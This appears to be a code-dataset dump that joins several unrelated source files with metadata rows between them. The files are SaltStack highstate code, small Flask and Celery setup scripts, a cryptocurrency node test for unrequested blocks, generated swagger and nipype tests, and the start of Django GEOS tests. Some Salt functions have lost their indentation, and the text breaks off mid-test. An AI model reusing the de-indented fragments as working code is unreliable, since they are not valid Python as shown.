err = ('Exclude Declaration in SLS {0} is not formed '
'as a list'.format(sls))
errors.append(err)
state.setdefault('__exclude__', []).extend(exc)
def render_highstate(self, matches):
    '''
    Gather the state files and render them into a single unified salt
    high data structure.

    matches -- mapping of saltenv -> list of sls glob patterns (as
               produced by top_matches). Returns
               ``(highstate, all_errors)``.
    '''
    highstate = self.building_highstate
    all_errors = []
    mods = set()
    statefiles = []
    for saltenv, states in six.iteritems(matches):
        for sls_match in states:
            try:
                statefiles = fnmatch.filter(self.avail[saltenv], sls_match)
            except KeyError:
                all_errors.extend(['No matching salt environment for environment {0!r} found'.format(saltenv)])
            # if we did not found any sls in the fileserver listing, this
            # may be because the sls was generated or added later, we can
            # try to directly execute it, and if it fails, anyway it will
            # return the former error
            if not statefiles:
                statefiles = [sls_match]
            for sls in statefiles:
                r_env = '{0}:{1}'.format(saltenv, sls)
                if r_env in mods:
                    # Already rendered via an include elsewhere.
                    continue
                state, errors = self.render_state(
                    sls, saltenv, mods, matches)
                if state:
                    self.merge_included_states(highstate, state, errors)
                # Rewrite "not available" errors into a friendlier
                # "no matching sls" message for the original pattern.
                for i, error in enumerate(errors[:]):
                    if 'is not available' in error:
                        # match SLS foobar in environment
                        this_sls = 'SLS {0} in saltenv'.format(
                            sls_match)
                        if this_sls in error:
                            errors[i] = (
                                'No matching sls found for {0!r} '
                                'in env {1!r}'.format(sls_match, saltenv))
                all_errors.extend(errors)
    self.clean_duplicate_extends(highstate)
    return highstate, all_errors
def clean_duplicate_extends(self, highstate):
    '''
    Collapse the global ``__extend__`` list so each (id, body) pair
    appears exactly once, preserving first-seen order.
    '''
    if '__extend__' not in highstate:
        return
    seen = []
    for ext in highstate['__extend__']:
        for pair in ext.items():
            if pair not in seen:
                seen.append(pair)
    highstate['__extend__'] = [{name: body} for name, body in seen]
def merge_included_states(self, highstate, state, errors):
    '''
    Fold ``state`` (one rendered sls) into the accumulated
    ``highstate`` in place, appending ID-collision messages to
    ``errors``.
    '''
    # The extend members can not be treated as globally unique:
    if '__extend__' in state:
        highstate.setdefault('__extend__',
                             []).extend(state.pop('__extend__'))
    if '__exclude__' in state:
        highstate.setdefault('__exclude__',
                             []).extend(state.pop('__exclude__'))
    for id_ in state:
        if id_ in highstate:
            # Identical duplicate definitions are tolerated; only
            # conflicting bodies are an error.
            if highstate[id_] != state[id_]:
                errors.append((
                    'Detected conflicting IDs, SLS'
                    ' IDs need to be globally unique.\n The'
                    ' conflicting ID is {0!r} and is found in SLS'
                    ' \'{1}:{2}\' and SLS \'{3}:{4}\'').format(
                        id_,
                        highstate[id_]['__env__'],
                        highstate[id_]['__sls__'],
                        state[id_]['__env__'],
                        state[id_]['__sls__'])
                )
    try:
        highstate.update(state)
    except ValueError:
        errors.append(
            'Error when rendering state with contents: {0}'.format(state)
        )
def _check_pillar(self, force=False):
'''
Check the pillar for errors, refuse to run the state if there are
errors in the pillar and return the pillar errors
'''
if force:
return True
if '_errors' in self.state.opts['pillar']:
return False
return True
def matches_whitelist(self, matches, whitelist):
'''
Reads over the matches and returns a matches dict with just the ones
that are in the whitelist
'''
if not whitelist:
return matches
ret_matches = {}
if not isinstance(whitelist, list):
whitelist = whitelist.split(',')
for env in matches:
for sls in matches[env]:
if sls in whitelist:
ret_matches[env] = ret_matches[env] if env in ret_matches else []
ret_matches[env].append(sls)
return ret_matches
def call_highstate(self, exclude=None, cache=None, cache_name='highstate',
                   force=False, whitelist=None):
    '''
    Run the sequence to execute the salt highstate for this minion.

    exclude    -- extra sls names (list or comma string) to exclude
    cache      -- when truthy, replay the cached high data if present
    cache_name -- basename of the cache file under opts['cachedir']
    force      -- skip the pillar error check
    whitelist  -- restrict execution to these sls names
    '''
    # Check that top file exists
    tag_name = 'no_|-states_|-states_|-None'
    ret = {tag_name: {
        'result': False,
        'comment': 'No states found for this minion',
        'name': 'No States',
        'changes': {},
        '__run_num__': 0,
    }}
    cfn = os.path.join(
        self.opts['cachedir'],
        '{0}.cache.p'.format(cache_name)
    )
    if cache:
        if os.path.isfile(cfn):
            # Replay the previously serialized high data directly.
            with salt.utils.fopen(cfn, 'rb') as fp_:
                high = self.serial.load(fp_)
                return self.state.call_high(high)
    # File exists so continue
    err = []
    try:
        top = self.get_top()
    except SaltRenderError as err:
        # NOTE: rebinds ``err`` from the list above; harmless only
        # because this branch returns immediately.
        ret[tag_name]['comment'] = 'Unable to render top file: '
        ret[tag_name]['comment'] += err.error
        return ret
    except Exception:
        trb = traceback.format_exc()
        err.append(trb)
        return err
    err += self.verify_tops(top)
    matches = self.top_matches(top)
    if not matches:
        msg = ('No Top file or external nodes data matches found')
        ret[tag_name]['comment'] = msg
        return ret
    matches = self.matches_whitelist(matches, whitelist)
    self.load_dynamic(matches)
    if not self._check_pillar(force):
        err += ['Pillar failed to render with the following messages:']
        err += self.state.opts['pillar']['_errors']
    else:
        high, errors = self.render_highstate(matches)
        if exclude:
            if isinstance(exclude, str):
                exclude = exclude.split(',')
            if '__exclude__' in high:
                high['__exclude__'].extend(exclude)
            else:
                high['__exclude__'] = exclude
        err += errors
    if err:
        return err
    if not high:
        return ret
    # Serialize the high data for later --cache runs; best effort only.
    cumask = os.umask(0o77)
    try:
        if salt.utils.is_windows():
            # Make sure cache file isn't read-only
            self.state.functions['cmd.run']('attrib -R "{0}"'.format(cfn), output_loglevel='quiet')
        with salt.utils.fopen(cfn, 'w+b') as fp_:
            try:
                self.serial.dump(high, fp_)
            except TypeError:
                # Can't serialize pydsl
                pass
    except (IOError, OSError):
        msg = 'Unable to write to "state.highstate" cache file {0}'
        log.error(msg.format(cfn))
    os.umask(cumask)
    return self.state.call_high(high)
def compile_highstate(self):
    '''
    Return the fully rendered highstate for this minion, or the list of
    errors encountered while gathering and rendering it.
    '''
    errors = []
    top = self.get_top()
    errors.extend(self.verify_tops(top))
    high, render_errors = self.render_highstate(self.top_matches(top))
    errors.extend(render_errors)
    if errors:
        return errors
    return high
def compile_low_chunks(self):
    '''
    Compile the highstate but don't run it, return the low chunks to
    see exactly what the highstate will execute.

    Mirrors the preprocessing done in State.call_high (reconcile
    extend, verify, requisite_in, exclude) and returns either the low
    chunks or the list of errors.
    '''
    top = self.get_top()
    matches = self.top_matches(top)
    high, errors = self.render_highstate(matches)
    # If there is extension data reconcile it
    high, ext_errors = self.state.reconcile_extend(high)
    errors += ext_errors
    # Verify that the high data is structurally sound
    errors += self.state.verify_high(high)
    high, req_in_errors = self.state.requisite_in(high)
    errors += req_in_errors
    high = self.state.apply_exclude(high)
    if errors:
        return errors
    # Compile and verify the raw chunks
    chunks = self.state.compile_high_data(high)
    return chunks
class HighState(BaseHighState):
    '''
    Generate and execute the salt "High State". The High State is the
    compound state derived from a group of template files stored on the
    salt master or in the local cache.
    '''
    # a stack of active HighState objects during a state.highstate run
    # (class-level: shared by every instance in the process)
    stack = []

    def __init__(self, opts, pillar=None, jid=None):
        self.opts = opts
        # The file client must exist before BaseHighState.__init__ runs,
        # since that constructor queries it immediately.
        self.client = salt.fileclient.get_file_client(self.opts)
        BaseHighState.__init__(self, opts)
        self.state = State(self.opts, pillar, jid)
        self.matcher = salt.minion.Matcher(self.opts)
        # tracks all pydsl state declarations globally across sls files
        self._pydsl_all_decls = {}
        # a stack of current rendering Sls objects, maintained and used by the pydsl renderer.
        self._pydsl_render_stack = []

    def push_active(self):
        # Appends to the shared class-level stack, not a per-instance one.
        self.stack.append(self)

    @classmethod
    def clear_active(cls):
        # Nuclear option
        #
        # Blow away the entire stack. Used primarily by the test runner but also
        # useful in custom wrappers of the HighState class, to reset the stack
        # to a fresh state.
        cls.stack = []

    @classmethod
    def pop_active(cls):
        cls.stack.pop()

    @classmethod
    def get_active(cls):
        # Return the most recently pushed HighState, or None when the
        # stack is empty.
        try:
            return cls.stack[-1]
        except IndexError:
            return None
class MasterState(State):
    '''
    Create a State object for master side compiling
    '''
    def __init__(self, opts, minion):
        # NOTE(review): ``minion`` is accepted but unused; State is
        # initialized from ``opts`` alone.
        State.__init__(self, opts)

    def load_modules(self, data=None):
        '''
        Load the modules into the state
        '''
        log.info('Loading fresh modules for state activity')
        # Load a modified client interface that looks like the interface used
        # from the minion, but uses remote execution
        #
        self.functions = salt.client.FunctionWrapper(
            self.opts,
            self.opts['id']
        )
        # Load the states, but they should not be used in this class apart
        # from inspection
        self.states = salt.loader.states(self.opts, self.functions)
        self.rend = salt.loader.render(self.opts, self.functions, states=self.states)
class MasterHighState(HighState):
    '''
    Execute highstate compilation from the master
    '''
    def __init__(self, master_opts, minion_opts, grains, id_,
                 saltenv=None,
                 env=None):
        # ``env`` is the deprecated spelling of ``saltenv``; warn and map
        # it through until the Boron release.
        if isinstance(env, six.string_types):
            salt.utils.warn_until(
                'Boron',
                'Passing a salt environment should be done using \'saltenv\' '
                'not \'env\'. This functionality will be removed in Salt '
                'Boron.'
            )
            # Backwards compatibility
            saltenv = env
        # Force the fileclient to be local
        opts = copy.deepcopy(minion_opts)
        opts['file_client'] = 'local'
        opts['file_roots'] = master_opts['master_roots']
        opts['renderer'] = master_opts['renderer']
        opts['state_top'] = master_opts['state_top']
        opts['id'] = id_
        opts['grains'] = grains
        HighState.__init__(self, opts)
class RemoteHighState(object):
    '''
    Manage gathering the data from the master
    '''
    def __init__(self, opts, grains):
        self.opts = opts
        self.grains = grains
        self.serial = salt.payload.Serial(self.opts)
        # self.auth = salt.crypt.SAuth(opts)
        # Transport channel to the master for the _master_state call.
        self.channel = salt.transport.Channel.factory(self.opts['master_uri'])

    def compile_master(self):
        '''
        Return the state data from the master, or an empty dict when the
        request times out.
        '''
        load = {'grains': self.grains,
                'opts': self.opts,
                'cmd': '_master_state'}
        try:
            return self.channel.send(load, tries=3, timeout=72000)
        except SaltReqTimeoutError:
            return {}
| 42.408878
| 132
| 0.431081
|
4a04cb21c4bb5e8110cd9f795e680719f32470db
| 426
|
py
|
Python
|
microblog.py
|
Colton21/fat_logbook
|
059d58ee1218aff72d90aa463d4ddf5fd9379df6
|
[
"MIT"
] | null | null | null |
microblog.py
|
Colton21/fat_logbook
|
059d58ee1218aff72d90aa463d4ddf5fd9379df6
|
[
"MIT"
] | null | null | null |
microblog.py
|
Colton21/fat_logbook
|
059d58ee1218aff72d90aa463d4ddf5fd9379df6
|
[
"MIT"
] | null | null | null |
from app import create_app, db, cli
from app.models import User, Post, Message, Notification, Task, StartShiftPost, EndShiftPost
# Build the Flask application via the factory and attach the project's
# custom CLI commands to it.
app = create_app()
cli.register(app)
@app.shell_context_processor
def make_shell_context():
    """Expose the db handle and model classes in ``flask shell``."""
    return dict(db=db, User=User, Post=Post, Message=Message,
                Notification=Notification, Task=Task,
                StartShiftPost=StartShiftPost, EndShiftPost=EndShiftPost)
| 32.769231
| 92
| 0.70892
|
4a04cb24a8fecf1f76c6104ba56a84cdc1610df8
| 571
|
py
|
Python
|
config/celery_app.py
|
4kumax/lev
|
83f5f42c9a487875f4e77f0d45cab24ffd6eb52a
|
[
"MIT"
] | null | null | null |
config/celery_app.py
|
4kumax/lev
|
83f5f42c9a487875f4e77f0d45cab24ffd6eb52a
|
[
"MIT"
] | null | null | null |
config/celery_app.py
|
4kumax/lev
|
83f5f42c9a487875f4e77f0d45cab24ffd6eb52a
|
[
"MIT"
] | null | null | null |
"""Celery application bootstrap: creates the shared ``app`` instance at
import time so Django and the celery worker use one configuration."""
import os
from celery import Celery
# set the default Django settings module for the 'celery' program.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings.local")
app = Celery("levgit")
# Using a string here means the worker doesn't have to serialize
# the configuration object to child processes.
# - namespace='CELERY' means all celery-related configuration keys
#   should have a `CELERY_` prefix.
app.config_from_object("django.conf:settings", namespace="CELERY")
# Load task modules from all registered Django app configs.
app.autodiscover_tasks()
| 31.722222
| 72
| 0.781086
|
4a04ccc17123153de649d1674e34e0e8761a4169
| 10,074
|
py
|
Python
|
test/functional/p2p-acceptblock.py
|
BitBridgeCoin/BitBridgeCoin
|
7d4d78472bf9dbfd6458498cdef78954796674da
|
[
"MIT"
] | 4
|
2021-04-07T15:12:54.000Z
|
2021-06-14T01:43:35.000Z
|
test/functional/p2p-acceptblock.py
|
BitBridgeCoin/BitBridgeCoin
|
7d4d78472bf9dbfd6458498cdef78954796674da
|
[
"MIT"
] | null | null | null |
test/functional/p2p-acceptblock.py
|
BitBridgeCoin/BitBridgeCoin
|
7d4d78472bf9dbfd6458498cdef78954796674da
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2015-2016 The BitBridgeCoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test processing of unrequested blocks.
Since behavior differs when receiving unrequested blocks from whitelisted peers
versus non-whitelisted peers, this tests the behavior of both (effectively two
separate tests running in parallel).
Setup: two nodes, node0 and node1, not connected to each other. Node0 does not
whitelist localhost, but node1 does. They will each be on their own chain for
this test.
We have one NodeConn connection to each, test_node and white_node respectively.
The test:
1. Generate one block on each node, to leave IBD.
2. Mine a new block on each tip, and deliver to each node from node's peer.
The tip should advance.
3. Mine a block that forks the previous block, and deliver to each node from
corresponding peer.
Node0 should not process this block (just accept the header), because it is
unrequested and doesn't have more work than the tip.
Node1 should process because this is coming from a whitelisted peer.
4. Send another block that builds on the forking block.
Node0 should process this block but be stuck on the shorter chain, because
it's missing an intermediate block.
Node1 should reorg to this longer chain.
4b.Send 288 more blocks on the longer chain.
Node0 should process all but the last block (too far ahead in height).
Send all headers to Node1, and then send the last block in that chain.
Node1 should accept the block because it's coming from a whitelisted peer.
5. Send a duplicate of the block in #3 to Node0.
Node0 should not process the block because it is unrequested, and stay on
the shorter chain.
6. Send Node0 an inv for the height 3 block produced in #4 above.
Node0 should figure out that Node0 has the missing height 2 block and send a
getdata.
7. Send Node0 the missing block again.
Node0 should process and the tip should advance.
"""
from test_framework.mininode import *
from test_framework.test_framework import BitBridgeCoinTestFramework
from test_framework.util import *
import time
from test_framework.blocktools import create_block, create_coinbase
class AcceptBlockTest(BitBridgeCoinTestFramework):
    """Functional test for acceptance of unrequested blocks.

    node0 (no whitelist) and node1 (whitelists localhost) are driven through
    the same scenario in parallel; see the module docstring for the numbered
    step-by-step script.
    """
    def add_options(self, parser):
        # The daemon binary under test may be overridden on the command line
        # or via the BITCOIND environment variable.
        parser.add_option("--testbinary", dest="testbinary",
                          default=os.getenv("BITCOIND", "bitbridgecoind"),
                          help="bitbridgecoind binary to test")
    def __init__(self):
        super().__init__()
        # Fresh chain so the heights asserted below (2, 3, 290) are exact.
        self.setup_clean_chain = True
        self.num_nodes = 2
        # node1 whitelists the test's p2p connection; node0 does not.
        self.extra_args = [[], ["-whitelist=127.0.0.1"]]
    def setup_network(self):
        # Node0 will be used to test behavior of processing unrequested blocks
        # from peers which are not whitelisted, while Node1 will be used for
        # the whitelisted case.
        # Note: the two nodes are deliberately NOT connected to each other,
        # so each stays on its own chain.
        self.setup_nodes()
    def run_test(self):
        """Drive both nodes through the unrequested-block scenarios
        described in the module docstring (steps 1-7)."""
        # Setup the p2p connections and start up the network thread.
        test_node = NodeConnCB() # connects to node0 (not whitelisted)
        white_node = NodeConnCB() # connects to node1 (whitelisted)
        connections = []
        connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], test_node))
        connections.append(NodeConn('127.0.0.1', p2p_port(1), self.nodes[1], white_node))
        test_node.add_connection(connections[0])
        white_node.add_connection(connections[1])
        NetworkThread().start() # Start up network handling in another thread
        # Test logic begins here
        test_node.wait_for_verack()
        white_node.wait_for_verack()
        # 1. Have both nodes mine a block (leave IBD)
        [ n.generate(1) for n in self.nodes ]
        tips = [ int("0x" + n.getbestblockhash(), 0) for n in self.nodes ]
        # 2. Send one block that builds on each tip.
        # This should be accepted.
        blocks_h2 = [] # the height 2 blocks on each node's chain
        block_time = int(time.time()) + 1
        for i in range(2):
            blocks_h2.append(create_block(tips[i], create_coinbase(2), block_time))
            blocks_h2[i].solve()
            block_time += 1
        test_node.send_message(msg_block(blocks_h2[0]))
        white_node.send_message(msg_block(blocks_h2[1]))
        [ x.sync_with_ping() for x in [test_node, white_node] ]
        assert_equal(self.nodes[0].getblockcount(), 2)
        assert_equal(self.nodes[1].getblockcount(), 2)
        self.log.info("First height 2 block accepted by both nodes")
        # 3. Send another block that builds on the original tip.
        blocks_h2f = [] # Blocks at height 2 that fork off the main chain
        for i in range(2):
            blocks_h2f.append(create_block(tips[i], create_coinbase(2), blocks_h2[i].nTime+1))
            blocks_h2f[i].solve()
        test_node.send_message(msg_block(blocks_h2f[0]))
        white_node.send_message(msg_block(blocks_h2f[1]))
        [ x.sync_with_ping() for x in [test_node, white_node] ]
        # node0 should only have the header: the block is unrequested and has
        # no more work than the current tip.
        for x in self.nodes[0].getchaintips():
            if x['hash'] == blocks_h2f[0].hash:
                assert_equal(x['status'], "headers-only")
        # node1 processed it (whitelisted peer), but it is not the best chain.
        for x in self.nodes[1].getchaintips():
            if x['hash'] == blocks_h2f[1].hash:
                assert_equal(x['status'], "valid-headers")
        self.log.info("Second height 2 block accepted only from whitelisted peer")
        # 4. Now send another block that builds on the forking chain.
        blocks_h3 = []
        for i in range(2):
            blocks_h3.append(create_block(blocks_h2f[i].sha256, create_coinbase(3), blocks_h2f[i].nTime+1))
            blocks_h3[i].solve()
        test_node.send_message(msg_block(blocks_h3[0]))
        white_node.send_message(msg_block(blocks_h3[1]))
        [ x.sync_with_ping() for x in [test_node, white_node] ]
        # Since the earlier block was not processed by node0, the new block
        # can't be fully validated.
        for x in self.nodes[0].getchaintips():
            if x['hash'] == blocks_h3[0].hash:
                assert_equal(x['status'], "headers-only")
        # But this block should be accepted by node0 since it has more work.
        self.nodes[0].getblock(blocks_h3[0].hash)
        self.log.info("Unrequested more-work block accepted from non-whitelisted peer")
        # Node1 should have accepted and reorged.
        assert_equal(self.nodes[1].getblockcount(), 3)
        self.log.info("Successfully reorged to length 3 chain from whitelisted peer")
        # 4b. Now mine 288 more blocks and deliver; all should be processed but
        # the last (height-too-high) on node0. Node1 should process the tip if
        # we give it the headers chain leading to the tip.
        tips = blocks_h3
        headers_message = msg_headers()
        all_blocks = [] # node0's blocks
        for j in range(2):
            for i in range(288):
                next_block = create_block(tips[j].sha256, create_coinbase(i + 4), tips[j].nTime+1)
                next_block.solve()
                if j==0:
                    # Deliver full blocks to node0 directly...
                    test_node.send_message(msg_block(next_block))
                    all_blocks.append(next_block)
                else:
                    # ...but only accumulate headers for node1; the tip block
                    # itself is delivered below.
                    headers_message.headers.append(CBlockHeader(next_block))
                tips[j] = next_block
        time.sleep(2)
        # Blocks 1-287 should be accepted, block 288 should be ignored because it's too far ahead
        for x in all_blocks[:-1]:
            self.nodes[0].getblock(x.hash)
        assert_raises_jsonrpc(-1, "Block not found on disk", self.nodes[0].getblock, all_blocks[-1].hash)
        headers_message.headers.pop() # Ensure the last block is unrequested
        white_node.send_message(headers_message) # Send headers leading to tip
        white_node.send_message(msg_block(tips[1])) # Now deliver the tip
        white_node.sync_with_ping()
        self.nodes[1].getblock(tips[1].hash)
        self.log.info("Unrequested block far ahead of tip accepted from whitelisted peer")
        # 5. Test handling of unrequested block on the node that didn't process
        # Should still not be processed (even though it has a child that has more
        # work).
        test_node.send_message(msg_block(blocks_h2f[0]))
        # Here, if the sleep is too short, the test could falsely succeed (if the
        # node hasn't processed the block by the time the sleep returns, and then
        # the node processes it and incorrectly advances the tip).
        # But this would be caught later on, when we verify that an inv triggers
        # a getdata request for this block.
        test_node.sync_with_ping()
        assert_equal(self.nodes[0].getblockcount(), 2)
        self.log.info("Unrequested block that would complete more-work chain was ignored")
        # 6. Try to get node to request the missing block.
        # Poke the node with an inv for block at height 3 and see if that
        # triggers a getdata on block 2 (it should if block 2 is missing).
        with mininode_lock:
            # Clear state so we can check the getdata request
            test_node.last_message.pop("getdata", None)
            test_node.send_message(msg_inv([CInv(2, blocks_h3[0].sha256)]))
        test_node.sync_with_ping()
        with mininode_lock:
            getdata = test_node.last_message["getdata"]
        # Check that the getdata includes the right block
        assert_equal(getdata.inv[0].hash, blocks_h2f[0].sha256)
        self.log.info("Inv at tip triggered getdata for unprocessed block")
        # 7. Send the missing block for the third time (now it is requested)
        test_node.send_message(msg_block(blocks_h2f[0]))
        test_node.sync_with_ping()
        # Tip advances to height 290 (2 + 288) once the gap is filled.
        assert_equal(self.nodes[0].getblockcount(), 290)
        self.log.info("Successfully reorged to longer chain from non-whitelisted peer")
        [ c.disconnect_node() for c in connections ]
if __name__ == '__main__':
    # Entry point: run the functional test via the framework's main().
    AcceptBlockTest().main()
| 44.773333
| 107
| 0.668156
|
4a04cd27a5a8ac51d0393a15da3a8bb86d9fd92a
| 615
|
py
|
Python
|
runserver.py
|
Samiasa/UsabilityConsole
|
38fa0d97d27c5f92e23f369d862602b0e9bca47d
|
[
"RSA-MD"
] | null | null | null |
runserver.py
|
Samiasa/UsabilityConsole
|
38fa0d97d27c5f92e23f369d862602b0e9bca47d
|
[
"RSA-MD"
] | 1
|
2021-06-07T17:15:42.000Z
|
2021-06-07T17:15:42.000Z
|
runserver.py
|
Samiasa/UsabilityConsole
|
38fa0d97d27c5f92e23f369d862602b0e9bca47d
|
[
"RSA-MD"
] | 1
|
2021-03-03T20:18:15.000Z
|
2021-03-03T20:18:15.000Z
|
from console import app
from config import DEBUG, HOST, PORT, RESET_DATABASE_ON_START
from flask import session as flask_session
import os
import logging
import utils
# Configure root logging before anything else emits records.
logging.basicConfig(
    level=logging.DEBUG,
    format='[%(asctime)s] [%(levelname)s] -- %(message)s',
    datefmt='%d-%b-%y %H:%M:%S',
)

if __name__ == "__main__":
    logging.debug("Starting server. DEBUG=%s", DEBUG)
    try:
        # In debug mode, optionally wipe the on-disk database before starting.
        if DEBUG and RESET_DATABASE_ON_START:
            database_path = os.path.join('console', 'db', 'database.db')
            utils.delete_file_if_exists(database_path, 'Deleting previous database...')
    finally:
        # Start the Flask app even if the reset above raised — this preserves
        # the original try/finally semantics.
        app.run(debug=DEBUG, host=HOST, port=PORT)
| 32.368421
| 124
| 0.699187
|
4a04d04953c5357d9136fd68edf035f03b91a845
| 881
|
py
|
Python
|
test/test_requirement_resource.py
|
rcbops/qtest-swagger-client
|
28220aa95d878922ca4b35c325706932adabea4e
|
[
"Apache-2.0"
] | 1
|
2019-09-10T17:55:53.000Z
|
2019-09-10T17:55:53.000Z
|
test/test_requirement_resource.py
|
rcbops/qtest-swagger-client
|
28220aa95d878922ca4b35c325706932adabea4e
|
[
"Apache-2.0"
] | null | null | null |
test/test_requirement_resource.py
|
rcbops/qtest-swagger-client
|
28220aa95d878922ca4b35c325706932adabea4e
|
[
"Apache-2.0"
] | 2
|
2019-02-12T23:15:10.000Z
|
2022-03-11T20:08:28.000Z
|
# coding: utf-8
"""
qTest Manager API Version 8.6 - 9.1
qTest Manager API Version 8.6 - 9.1
OpenAPI spec version: 8.6 - 9.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import swagger_client
from swagger_client.rest import ApiException
from swagger_client.models.requirement_resource import RequirementResource
class TestRequirementResource(unittest.TestCase):
    """Unit test stubs for the RequirementResource model."""

    def setUp(self):
        # The generated stubs need no fixtures.
        pass

    def tearDown(self):
        # Nothing to clean up.
        pass

    def testRequirementResource(self):
        """
        Smoke-test that a RequirementResource can be constructed.
        """
        resource = swagger_client.models.requirement_resource.RequirementResource()
if __name__ == '__main__':
    # Run the generated test stubs with the standard unittest runner.
    unittest.main()
| 20.488372
| 81
| 0.668558
|
4a04d1409df2d3b1d1bc8effbb1ba3078d537da2
| 3,098
|
py
|
Python
|
nipype/interfaces/mrtrix/tests/test_auto_SphericallyDeconvolutedStreamlineTrack.py
|
Conxz/nipype
|
1281723ae56eacd103597ff4081a205583706e62
|
[
"Apache-2.0"
] | null | null | null |
nipype/interfaces/mrtrix/tests/test_auto_SphericallyDeconvolutedStreamlineTrack.py
|
Conxz/nipype
|
1281723ae56eacd103597ff4081a205583706e62
|
[
"Apache-2.0"
] | null | null | null |
nipype/interfaces/mrtrix/tests/test_auto_SphericallyDeconvolutedStreamlineTrack.py
|
Conxz/nipype
|
1281723ae56eacd103597ff4081a205583706e62
|
[
"Apache-2.0"
] | null | null | null |
# AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from ....testing import assert_equal
from ..tracking import SphericallyDeconvolutedStreamlineTrack
def test_SphericallyDeconvolutedStreamlineTrack_inputs():
    """Verify the input trait metadata of SphericallyDeconvolutedStreamlineTrack.

    Auto-generated by tools/checkspecs.py (see header) — the expected map
    below mirrors the interface spec and should not be hand-edited.
    """
    # Expected trait metadata, keyed by input name.
    input_map = dict(args=dict(argstr='%s',
    ),
    cutoff_value=dict(argstr='-cutoff %s',
    units='NA',
    ),
    desired_number_of_tracks=dict(argstr='-number %d',
    ),
    do_not_precompute=dict(argstr='-noprecomputed',
    ),
    environ=dict(nohash=True,
    usedefault=True,
    ),
    exclude_file=dict(argstr='-exclude %s',
    xor=[u'exclude_file', u'exclude_spec'],
    ),
    exclude_spec=dict(argstr='-exclude %s',
    position=2,
    sep=',',
    units='mm',
    xor=[u'exclude_file', u'exclude_spec'],
    ),
    ignore_exception=dict(nohash=True,
    usedefault=True,
    ),
    in_file=dict(argstr='%s',
    mandatory=True,
    position=-2,
    ),
    include_file=dict(argstr='-include %s',
    xor=[u'include_file', u'include_spec'],
    ),
    include_spec=dict(argstr='-include %s',
    position=2,
    sep=',',
    units='mm',
    xor=[u'include_file', u'include_spec'],
    ),
    initial_cutoff_value=dict(argstr='-initcutoff %s',
    units='NA',
    ),
    initial_direction=dict(argstr='-initdirection %s',
    units='voxels',
    ),
    inputmodel=dict(argstr='%s',
    position=-3,
    usedefault=True,
    ),
    mask_file=dict(argstr='-mask %s',
    xor=[u'mask_file', u'mask_spec'],
    ),
    mask_spec=dict(argstr='-mask %s',
    position=2,
    sep=',',
    units='mm',
    xor=[u'mask_file', u'mask_spec'],
    ),
    maximum_number_of_tracks=dict(argstr='-maxnum %d',
    ),
    maximum_tract_length=dict(argstr='-length %s',
    units='mm',
    ),
    minimum_radius_of_curvature=dict(argstr='-curvature %s',
    units='mm',
    ),
    minimum_tract_length=dict(argstr='-minlength %s',
    units='mm',
    ),
    no_mask_interpolation=dict(argstr='-nomaskinterp',
    ),
    out_file=dict(argstr='%s',
    name_source=[u'in_file'],
    name_template='%s_tracked.tck',
    output_name='tracked',
    position=-1,
    ),
    seed_file=dict(argstr='-seed %s',
    xor=[u'seed_file', u'seed_spec'],
    ),
    seed_spec=dict(argstr='-seed %s',
    position=2,
    sep=',',
    units='mm',
    xor=[u'seed_file', u'seed_spec'],
    ),
    step_size=dict(argstr='-step %s',
    units='mm',
    ),
    stop=dict(argstr='-stop',
    ),
    terminal_output=dict(nohash=True,
    ),
    unidirectional=dict(argstr='-unidirectional',
    ),
    )
    inputs = SphericallyDeconvolutedStreamlineTrack.input_spec()
    # Nose-style generator test: yield one assert per (trait, metadata) pair.
    for key, metadata in list(input_map.items()):
        for metakey, value in list(metadata.items()):
            yield assert_equal, getattr(inputs.traits()[key], metakey), value
def test_SphericallyDeconvolutedStreamlineTrack_outputs():
    """Verify the output trait metadata of SphericallyDeconvolutedStreamlineTrack.

    Auto-generated by tools/checkspecs.py (see header) — do not hand-edit.
    """
    # Expected output traits, keyed by output name.
    output_map = dict(tracked=dict(),
    )
    outputs = SphericallyDeconvolutedStreamlineTrack.output_spec()
    # Nose-style generator test: yield one assert per (trait, metadata) pair.
    for key, metadata in list(output_map.items()):
        for metakey, value in list(metadata.items()):
            yield assert_equal, getattr(outputs.traits()[key], metakey), value
| 26.706897
| 78
| 0.629761
|
4a04d15ad9bf59e31d09746d2f74acef5c086c66
| 42,100
|
py
|
Python
|
django/contrib/gis/geos/tests/test_geos.py
|
mitar/django
|
aa757ac22de3e657df49086cf01a26f6c73b8dfb
|
[
"BSD-3-Clause"
] | 1
|
2016-05-09T02:41:07.000Z
|
2016-05-09T02:41:07.000Z
|
django/contrib/gis/geos/tests/test_geos.py
|
akaihola/django
|
169b1a404c8118bb75840523d5fb3543de9c8889
|
[
"BSD-3-Clause"
] | null | null | null |
django/contrib/gis/geos/tests/test_geos.py
|
akaihola/django
|
169b1a404c8118bb75840523d5fb3543de9c8889
|
[
"BSD-3-Clause"
] | null | null | null |
import ctypes
import random
import unittest
from django.contrib.gis.geos import *
from django.contrib.gis.geos.base import gdal, numpy, GEOSBase
from django.contrib.gis.geos.libgeos import GEOS_PREPARE
from django.contrib.gis.geometry.test_data import TestDataMixin
class GEOSTest(unittest.TestCase, TestDataMixin):
@property
def null_srid(self):
"""
Returns the proper null SRID depending on the GEOS version.
See the comments in `test15_srid` for more details.
"""
info = geos_version_info()
if info['version'] == '3.0.0' and info['release_candidate']:
return -1
else:
return None
    def test00_base(self):
        "Tests out the GEOSBase class."
        # Testing out GEOSBase class, which provides a `ptr` property
        # that abstracts out access to underlying C pointers.
        class FakeGeom1(GEOSBase):
            pass
        # This one only accepts pointers to floats
        c_float_p = ctypes.POINTER(ctypes.c_float)
        class FakeGeom2(GEOSBase):
            ptr_type = c_float_p
        # Default ptr_type is `c_void_p`.
        fg1 = FakeGeom1()
        # Default ptr_type is C float pointer
        fg2 = FakeGeom2()
        # These assignments are OK -- None is allowed because
        # it's equivalent to the NULL pointer.
        fg1.ptr = ctypes.c_void_p()
        fg1.ptr = None
        fg2.ptr = c_float_p(ctypes.c_float(5.23))
        fg2.ptr = None
        # Because pointers have been set to NULL, an exception should be
        # raised when we try to access it.  Raising an exception is
        # preferable to a segmentation fault that commonly occurs when
        # a C method is given a NULL memory reference.
        for fg in (fg1, fg2):
